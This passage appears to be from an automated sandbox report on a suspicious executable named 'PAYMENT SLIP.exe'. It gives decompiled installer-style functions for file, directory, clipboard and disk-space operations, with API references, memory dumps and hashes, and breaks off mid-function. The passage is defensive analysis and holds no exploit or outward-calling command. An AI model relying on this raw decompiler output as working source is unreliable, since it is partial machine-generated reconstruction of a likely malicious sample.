              Function 00406032, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
              Download Yara Rule
              C-Code - Quality: 68%
              			E00406032(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





              0x00406036
              0x00406043
              0x00406058
              0x0040605e

              APIs
              • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\PAYMENT SLIP.exe,80000000,00000003), ref: 00406036
              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
              • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
              • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040600D, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E0040600D(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





              0x00406012
              0x00406018
              0x0040601d
              0x00406026
              0x00406026
              0x0040602f

              APIs
              • GetFileAttributesW.KERNELBASE(?,?,00405C12,?,?,00000000,00405DE8,?,?,?,?), ref: 00406012
              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406026
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 2aab62ad23f8cb6709c95f945eae6201b0fb2c2ffcd307ea01f0c72ec21377a4
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: 9AD0C972504131ABC2502728EE0889ABF55EF682717014A35F9A5A22B0CB314C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405AF0, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405AF0(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




              0x00405af6
              0x00405afe
              0x00000000
              0x00405b04
              0x00000000

              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,004035CB,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405AF6
              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405B04
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 7b2d9cd717f5aff8da3a1f7dd460dbe6a594badd890d3698b32dee5738bc8dc1
              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 50C04C30204601AEDA509B30DF08B177AA4AF50741F1158396246E40A0DA78A455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B11C29, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00B11BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              • CreateDirectoryW.KERNELBASE(000000FF,00000000,000000FF,1C200000,1A6CF026,?,?,?,00B120D6,?,?,?,?,00B11921,?,?), ref: 00B11C5F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AttributesCreateDirectoryFile
              • String ID:
              • API String ID: 3401506121-0
              • Opcode ID: ada78cb5b12b542870f83b1baa29243625b9d41bf1e615c763f2493063917f33
              • Instruction ID: 0798301b3c7e3c22d5ab3f23e62fe6b7561dcb45aa2d067fa04c981a85a1ead3
              • Opcode Fuzzy Hash: ada78cb5b12b542870f83b1baa29243625b9d41bf1e615c763f2493063917f33
              • Instruction Fuzzy Hash: 06E06D30A50209BACF20AB75CC81AEE7EE8DB01740F9008E4FA01D9210E6328AA0A694
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B11BDE, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
              Download Yara Rule
              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 00B11BFF
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction ID: e683db93034b9afb342550f41a04d917527f0dfe2fd70eb3b6722bd4351d420c
              • Opcode Fuzzy Hash: b7bda0b8c07b5c02538c4b90ace2375a0725cce56a20283952b39a7187ab7334
              • Instruction Fuzzy Hash: 01F01C74C40208EFDB00EFA8C8496ECBBB0EB00311F904AE5E9206B291D7314AE1DB84
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004060E4, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004060E4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004060e8
              0x004060f8
              0x00406100
              0x00000000
              0x00406107
              0x00000000
              0x00406109

              APIs
              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FF7B,0040CEF0,00403511,0040CEF0,0040FF7B,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004060B5, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004060B5(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





              0x004060b9
              0x004060c9
              0x004060d1
              0x00000000
              0x004060d8
              0x00000000
              0x004060da

              APIs
              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403590, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403590(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




              0x0040359e
              0x004035a4

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00B1126A, Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 00B1128F
              Memory Dump Source
              • Source File: 00000001.00000002.665765048.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 7b63a79f8f34518ecf7670f7cf5aa5bcc874eda58d09a4447a20b6297363c5fb
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: F0D017B1C50308BBCB04EBA0C84689DBBACDB05301F60819AB80066101DA759B609A94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 004056E3, Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a30c == _t156) {
								E004055A4( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040446B(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040446B(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E004044F9(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004044C7(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a274;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004044C7( *0x429230);
				 *0x429234 = E00404E20(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404492(_a4);
				if(( *0x42a27c & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a27c & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044C7( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a27c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































              0x004056eb
              0x004056f1
              0x004056fb
              0x004056fe
              0x00405894
              0x004058b8
              0x004058b8
              0x004058cb
              0x004058e9
              0x004058eb
              0x004058f3
              0x00405949
              0x0040594d
              0x00000000
              0x00000000
              0x0040594f
              0x00405955
              0x00000000
              0x00000000
              0x0040595f
              0x00405967
              0x0040596a
              0x00405a6c
              0x00000000
              0x00405a6c
              0x00405979
              0x00405984
              0x0040598d
              0x00405998
              0x0040599b
              0x004059a4
              0x004059aa
              0x004059ad
              0x004059ad
              0x004059c5
              0x004059ce
              0x004059d1
              0x004059d8
              0x004059df
              0x004059e7
              0x004059e7
              0x004059fe
              0x004059fe
              0x00405a05
              0x00405a0b
              0x00405a17
              0x00405a1e
              0x00405a27
              0x00405a29
              0x00405a2c
              0x00405a3b
              0x00405a3e
              0x00405a44
              0x00405a45
              0x00405a4b
              0x00405a4c
              0x00405a4d
              0x00405a55
              0x00405a60
              0x00405a66
              0x00405a66
              0x00000000
              0x004059c5
              0x004058fb
              0x0040592b
              0x00405933
              0x0040593e
              0x0040593e
              0x00405944
              0x00000000
              0x00405944
              0x004058ff
              0x00405909
              0x00000000
              0x004058cd
              0x004058d3
              0x0040590e
              0x00000000
              0x00405917
              0x004058dc
              0x004058e1
              0x004058e4
              0x00000000
              0x004058e4
              0x004058cb
              0x00405704
              0x00405708
              0x00405710
              0x00405714
              0x00405717
              0x0040571a
              0x0040571d
              0x00405720
              0x00405721
              0x00405722
              0x0040573b
              0x0040573e
              0x00405748
              0x00405757
              0x0040575f
              0x00405767
              0x0040576c
              0x0040576f
              0x0040577b
              0x00405784
              0x0040578d
              0x004057af
              0x004057b5
              0x004057c6
              0x004057cb
              0x004057d9
              0x004057e7
              0x004057e7
              0x004057ec
              0x004057fa
              0x004057fa
              0x004057ff
              0x00405802
              0x00405807
              0x00405813
              0x0040581c
              0x00405829
              0x00405838
              0x0040582b
              0x00405830
              0x00405830
              0x00405844
              0x00405844
              0x00405858
              0x00405861
              0x0040586a
              0x0040587a
              0x00405886
              0x00405886
              0x00000000

              APIs
              • GetDlgItem.USER32 ref: 00405741
              • GetDlgItem.USER32 ref: 00405750
              • GetClientRect.USER32 ref: 0040578D
              • GetSystemMetrics.USER32 ref: 00405794
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
              • ShowWindow.USER32(?,00000008), ref: 00405830
              • GetDlgItem.USER32 ref: 00405851
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
              • GetDlgItem.USER32 ref: 0040575F
                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
              • GetDlgItem.USER32 ref: 004058A3
              • CreateThread.KERNEL32(00000000,00000000,Function_00005677,00000000), ref: 004058B1
              • CloseHandle.KERNEL32(00000000), ref: 004058B8
              • ShowWindow.USER32(00000000), ref: 004058DC
              • ShowWindow.USER32(?,00000008), ref: 004058E1
              • ShowWindow.USER32(00000008), ref: 0040592B
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
              • CreatePopupMenu.USER32 ref: 00405970
              • AppendMenuW.USER32 ref: 00405984
              • GetWindowRect.USER32 ref: 004059A4
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
              • OpenClipboard.USER32(00000000), ref: 00405A05
              • EmptyClipboard.USER32 ref: 00405A0B
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
              • GlobalLock.KERNEL32 ref: 00405A21
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
              • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
              • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
              • CloseClipboard.USER32 ref: 00405A66
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp Download File
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: H7B${
              • API String ID: 590372296-2256286769
              • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
              • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
              • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404983, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E00404983(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B86(0x3fb, _t146);
					E004067EB(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B86(0x3fb, _t146);
							if(E00405F19(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653C(0x421718, _t146);
							_t87 = E00406931(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653C(0x421718, _t146);
								_t89 = E00405EBC(0x421718);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x421718) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E5D(0x421718);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x421718) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E20(5);
								if(_v12 != _t158) {
									_t197 = _v44;
